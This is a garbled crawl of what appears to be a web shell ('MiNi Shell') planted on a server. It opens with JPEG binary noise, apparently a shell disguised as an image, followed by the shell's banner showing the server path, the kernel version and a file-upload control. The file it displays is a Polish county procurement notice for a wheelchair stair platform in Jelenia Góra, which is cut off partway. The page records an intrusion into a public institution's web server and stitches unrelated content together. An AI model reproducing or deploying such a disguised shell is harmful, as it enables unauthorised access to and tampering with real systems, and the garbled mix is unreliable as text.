JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230124/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230124/0005432101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa i montaż wewnętrznej platformy schodowej w budynku Starostwa Powiatowego w Jeleniej Górze” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Karkonoski - Starostwo Powiatowe w Jeleniej Górze</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821492</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kochanowskiego 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jelenia Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(75) 64-731-00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@powiatkarkonoski.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.powiatkarkonoski.eu/5918</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa i montaż wewnętrznej platformy schodowej w budynku Starostwa Powiatowego w Jeleniej Górze” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0c4b1dc1-9bc7-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00054321</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Program Operacyjny Wiedza Edukacja Rozwój 2014-2020, współfinansowanego ze środków Europejskiego Funduszu Społecznego Oś priorytetowa II - Efektywne polityki publiczne dla rynku pracy, gospodarki i edukacji, Działanie 2.18 - Wysokiej jakości usługi administracyjne, Projekt Grantowy „Dostępny samorząd - granty” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-0c4b1dc1-9bc7-11ed-b4ea-f64d350121d2 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: bzp@powiatkarkonoski.eu (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający realizuje obowiązek informacyjny, o którym moa w art. 13 ust. 1 i 3 RODO w dokumentach zamówienia (Specyfikacja Warunków Zamówienia - Dział XXXIX)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający realizuje obowiązek informacyjny, o którym moa w art. 19 ust. ustawy Pzp w dokumentach zamówienia (Specyfikacja Warunków Zamówienia - Dział XXXIX)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.272.1.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 139383,33 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa, montaż i uruchomienie platformy schodowej wewnętrznej w budynku Starostwa Powiatowego w Jeleniej Górze przy ul. Jana Kochanowskiego 10, 58-500 Jelenia Góra, wraz z instruktażem, bieżącą konserwacją w okresie 12 miesięcy i gwarancją minimum 24 miesiące.<br/>2.	Zamówienie realizowane jest ze środków Unii Europejskiej w ramach Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020, współfinansowanego ze środków Europejskiego Funduszu Społecznego, Oś priorytetowa II - Efektywne polityki publiczne dla rynku pracy, gospodarki i edukacji, Działanie 2.18 - Wysokiej jakości usługi administracyjne, w związku z realizacją przez Powiat Karkonoski przedsięwzięcia grantowego pn. „Zwiększenie dostępności usług publicznych w Powiecie Karkonoskim” w ramach projektu grantowego dla jednostek samorządu terytorialnego pn. „Dostępny samorząd - granty” realizowanego przez Państwowy Fundusz Rehabilitacji Osób Niepełnosprawnych.<br/>3.	Szczegółowy opis przedmiotu zamówienia:<br/>Część I:<br/>Parametry techniczne platformy schodowej:<br/>Miejsce posadowienia platformy schodowej: parter budynku Starostwa Powiatowego <br/>w Jeleniej Górze przy ul. Jana Kochanowskiego 10, 58-500 Jelenia Góra, z zasięgiem obejmującym pierwsze i drugie piętro budynku. Platforma powinna posiadać wszelkie wymagane przepisami dopuszczenia do użytkowania w obiektach użyteczności publicznej. <br/>Charakterystyka techniczna platformy schodowej:<br/>Rodzaj napędu i typ urządzenia:<br/>- platforma schodowa o napędzie elektrycznym, na szynie krzywoliniowej, promień skrętu do 1800 stopni ze względu na konstrukcję klatki schodowej, służąca do transportu osób niepełnosprawnych na wózkach inwalidzkich. Sterowanie: przyciskowe, pilot na kablu spiralnym połączony z platformą jako opcja bez dopłaty joystick lub przyciski. Urządzenie posiada kontrolę dostępu w postaci stacyjka + klucz. Wymagane trzymanie wciśniętego przycisku w trakcie jazdy.<br/>Udźwig: - minimum 225kg<br/>Prędkość: - maksymalnie do 0,15 m/s <br/>Ilość przystanków: -<br/>- 3 (startowy, pośredni na I piętrze oraz docelowy na II piętrze lub parterze w zależności od punktu startu). <br/>Rodzaj i długość toru jezdnego:<br/> - tor jezdny wykonany ze stali nierdzewnej montowany na słupkach samonośnych lub na wspornikach do ścian wykonanych ze stali nierdzewnej po wewnętrznej stronie klatki schodowej, tor krzywoliniowy z odcinkiem szyny poziomej. Całkowita długość toru jezdnego - około 22 m (obecna długość barierki ~18 m).<br/>Kąt nachylenia platformy:<br/>- dobrany do przewożenia osób niepełnosprawnych na wózkach inwalidzkich zgodnie z obowiązującymi przepisami.<br/>Platforma:<br/>	o wymiarze wewnętrznym min 750 mm x 850 mm, przy czym wymiary platformy muszą spełniać wymogi przepisów osób niepełnosprawnych oraz platforma musi się mieścić w klatce schodowej,<br/>	platforma i obudowy w kolorze RAL7035, lub RAL 9007 (lub kolor standard),<br/>	podest wykończony materiałem antypoślizgowym,<br/>	elementy pomocnicze typu poręcze ułatwiające wjazd i zjazd z platformy,<br/>	płaskie rampy najazdowe na krawędziach platformy ułatwiające wjazd wózka <br/> i zabezpieczające przed zjechaniem wózka podczas jazdy,<br/>	dwie barierki zabezpieczające przed zjechaniem wózka z platformy,<br/>	awaryjne zatrzymanie - przycisk „STOP”, sygnał dźwiękowy ALARM,<br/>	aktywna podłoga – system przeciwzgnieceniowy + system przeciwtnący,<br/>	składanie/rozkładanie platformy – MANUALNE,<br/>	sposób najazdu na platformę – na wprost (wzdłuż toru jezdnego)<br/>	platforma wyposażona w wyświetlacz diagnostyczny, czujnik przeciążenia, ogranicznik prędkości.<br/>Zasilanie: 1-fazowe, 230V AC<br/>Uwaga: szerokość użytkowa biegów oraz spoczników klatki schodowej po montażu platformy schodowej (w stanie spoczynku) nie może być mniejsza niż 1,03 m. Obecna minimalna szerokość biegu klatki schodowej wynosi 1,28 m.<br/>Uwaga: miejsce przyłącza energetycznego wykona Zamawiający na własny koszt, po wcześniejszym uzgodnieniu z Wykonawcą. <br/>Uwaga: wykonawca wykona w obiekcie niezbędne prace pomiarowe, w celu zaprojektowania platformy schodowej w uzgodnieniu i akceptacją Zleceniodawcy.<br/>Wyposażenie standardowe:<br/>	bezprzewodowe, natynkowe kasety wezwań – 3 szt.,<br/>	zabezpieczenie platformy oraz kaset przed korzystaniem z urządzenia przez osoby nieupoważnione. <br/>Część II<br/>Informacje i wymagania dotyczące platformy:<br/>1)	Zamawiający wymaga, aby dostarczone urządzenie było fabrycznie nowe, nieużywane, nieuszkodzone, kompletne, spełniały wymagane prawem normy, były zgodne z Dyrektywą Maszynową 2006/42/WE (Maszyny), Dyrektywą Niskonapięciową 2006/95/WE, Kompatybilności Elektromagnetycznej 2004/108/WE i posiadały co najmniej parametry i cechy określone powyżej w części I opisu.<br/>2)	Wszystkie użyte materiały i zakupione urządzenia muszą posiadać wszelkie niezbędne atesty i certyfikaty w związku z użyciem ich w obiekcie użyteczności publicznej. Powinny spełniać również niezbędne wymagania przeciwpożarowe.<br/>3)	Zamawiający wymaga, aby Wykonawca na dostarczone i zamontowane urządzenie udzielił gwarancji jakości i rękojmi na okres nie krótszy niż 24 miesiące licząc od dnia protokolarnego bezusterkowego odbioru przedmiotu zamówienia oraz w trakcie pierwszych 12 miesięcy prowadził bieżącą konserwację platform i wykonywał wszelkie wymagane prawem przeglądy.<br/>4)	W ramach przedmiotu zamówienia Wykonawca zobowiązany jest do:<br/>	dostawy urządzenia do miejsca dostawy i montażu;<br/>	opracowania dokumentacji technicznej platformy, dokumentacji techniczno-ruchowej oraz dokumentacji powykonawczej wraz z wszelkimi niezbędnymi i wymaganymi przepisami prawa uzgodnieniami i zgłoszeniami;<br/>	rozruchu urządzenia;<br/>	przygotowania dokumentacji platformy dla potrzeb zgłoszenia do Urzędu Dozoru Technicznego(UDT);<br/>	uczestniczenie przy odbiorze urządzeń przez UDT;<br/>	wykonanie certyfikacji platformy, odbioru rejestracji i dopuszczenia do użytkowania przez UDT. Koszty związane z certyfikacją przez UDT, dokumentacją rejestracyjną i książką rewizji ponosi Wykonawca w ramach realizacji przedmiotu zamówienia. Wszelkich niezbędnych pełnomocnictw i upoważnień udziela Zamawiający;<br/>	instruktażu dla wyznaczonych pracowników Zamawiającego z obsługi i eksploatacji zamontowanego i uruchomionego urządzenia.<br/>	wykonawca jest odpowiedzialny za dostawę i montaż urządzenia zgodnie z umową oraz za jakość zastosowanych materiałów i wykonywanych prac, za ich zgodność z wymaganiami opisu przedmiotu zamówienia oraz poleceniami Zamawiającego.<br/>	następstwa jakiegokolwiek błędu spowodowanego przez Wykonawcę poprawione będą przez Wykonawcę na własny koszt.<br/>	decyzje Zamawiającego dotyczące akceptacji lub odrzucenia materiałów będą oparte na wymaganiach zawartych w umowie, opisie przedmiotu zamówienia, <br/>a także w normach i wytycznych.<br/>	polecenia Zamawiającego będą wykonywane nie później niż w czasie przez niego wyznaczonym, po ich otrzymaniu przez Wykonawcę, pod groźbą zatrzymania prac montażowych. Skutki finansowe z tego tytułu ponosi Wykonawca.<br/>	następstwa usterek i awarii, jeżeli nastąpiły one w wyniku wykonywanych prac, zostaną usunięte przez Wykonawcę w trybie natychmiastowym i na jego koszt.<br/>5)	Podstawowym dokumentem odbioru końcowego jest protokół odbioru końcowego, do którego Wykonawca powinien dostarczyć następujące dokumenty dla zamontowanej platformy:<br/>a)	świadectwo badania typu WE oraz deklarację zgodności wg Dyrektywy Maszynowej 2006/42/WE i certyfikaty zgodności,<br/>b)	karty gwarancyjne zamontowanych urządzeń oraz inne wymagane, obowiązującymi przepisami, a nie wymienionymi powyżej,<br/>c)	instrukcję użytkowania urządzenia w języku polskim,<br/>d)	projekt techniczny powykonawczy wraz z wszelkimi niezbędnymi i wymaganymi przepisami prawa uzgodnieniami i próbami oraz dokumentację techniczno–ruchową zamontowanego urządzenia,<br/>e)	specyfikację techniczną z atestami,<br/>f)	protokół elektryczny urządzenia (platformy z pomiarami),<br/>g)	protokół budowlany,<br/>h)	protokół z odbioru i dopuszczenia urządzenia przez UDT.<br/>6)	W przypadku, gdy według Zamawiającego zamówienie nie jest gotowe do odbioru końcowego, Zamawiający może wyznaczyć ponowny termin odbioru końcowego, prace poprawkowe uzupełniające powinny zostać wykonane w nowym terminie ustalonym przez Zamawiającego, jednak nie później niż do daty wskazanej w umowie.<br/>7)	Wykonawca świadczyć będzie usługi gwarancyjne w okresie wskazanym w ofercie, minimum 24 miesięcy od daty odbioru końcowego zamówienia.<br/>Uwaga: Okres gwarancji, stanowi jedno z punktowanych kryteriów oceny ofert, stąd Wykonawca może wydłużyć oferowany termin gwarancji – na zasadach określonych w Dziale XXVI Specyfikacji Warunków Zamówienia. W takiej sytuacji okres rękojmi za wady wydłuży się automatycznie o przedłużony okres gwarancji. Maksymalny zaoferowany okres gwarancji, jaki będzie oceniany przez Zamawiającego w ramach jednego z kryteriów oceny ofert, wynosi 60 miesięcy. Jeśli Wykonawca zaoferuje dłuższy niż 60-miesięczny okres gwarancji, Zamawiający przyzna ofercie taką ilość punktów, jak dla określonego w tym kryterium oceny ofert maksymalnego 60-miesięcznego okresu gwarancji.<br/>8)	Wykonawca w okresie pierwszych 12 miesięcy gwarancji zobowiązany będzie do wykonywania bieżącej konserwacji dostarczonej i oddanej do użytku platformy schodowej, utrzymania jej w stanie sprawności technicznej, dokonywania okresowych wymaganych przeglądów i napraw, usuwania awarii w czasie eksploatacji platformy.<br/>4.	Przedmiot zamówienia należy wykonać zgodnie z obowiązującymi przepisami, normami i warunkami technicznymi, w sposób nienaruszający interesów osób trzecich.<br/>5.	Przedmiot zamówienia będzie dostępny dla osób niepełnosprawnych zgodnie z art. 100 ust. 1 ustawy Pzp. Przedmiot zamówienia nie wprowadza barier architektonicznych dla osób niepełnosprawnych, w tym poruszających się na wózkach inwalidzkich – przedmiotem zamówienia jest dostawa i montaż platformy schodowej dla osób niepełnosprawnych.<br/>(Szczegółowy Opis Przedmiotu Zamówienia - Dział VI SWZ) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34514700-0 - Platformy ruchome</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-04-17</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Najkorzystniejsza oferta zostanie wybrana na podstawie następujących kryteriów oceny ofert:<br/>1)	Kryterium I – CENA – 60 pkt;<br/>2)	Kryterium II – OKRES GWARANCJI NA WYKONANE ROBOTY BUDOWLANE – 20 pkt;<br/>3)	Kryterium III – TERMIN REALIZACJI (DOSTAWY) PRZEDMIOTU ZAMÓWIENIA – 20 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">OKRES GWARANCJI NA WYKONANE ROBOTY BUDOWLANE</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN REALIZACJI (DOSTAWY) PRZEDMIOTU ZAMÓWIENIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp, a także na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r. poz. 835), zwanej dalej ustawą o przeciwdziałaniu wspieraniu agresji na Ukrainę;<br/>2)	spełniają warunki udziału w postępowaniu dotyczące:<br/>a)	zdolności do występowania w obrocie gospodarczym:<br/>	Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>	Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>c)	sytuacji ekonomicznej lub finansowej:<br/>	Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>d)	zdolności technicznej lub zawodowej:<br/>	Powyższy warunek zostanie spełniony, gdy Wykonawca wykaże, że w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składania ofert (a jeśli okres prowadzenia działalności jest krótszy, w tym okresie), wykonał w sposób należyty co najmniej jedno (1) zamówienie porównywalne z przedmiotem niniejszego zamówienia. Zamawiający przez zamówienie porównywalne z przedmiotem niniejszego zamówienia rozumie zrealizowanie dostawy i montażu platformy schodowej wewnętrznej w budynku użyteczności publicznej, o wartości nie mniejszej niż 65 000,00 zł brutto (słownie: sześćdziesiąt pięć tysięcy złotych 0/100). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, Wykonawca zostanie wezwany do złożenia:<br/>a)	oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 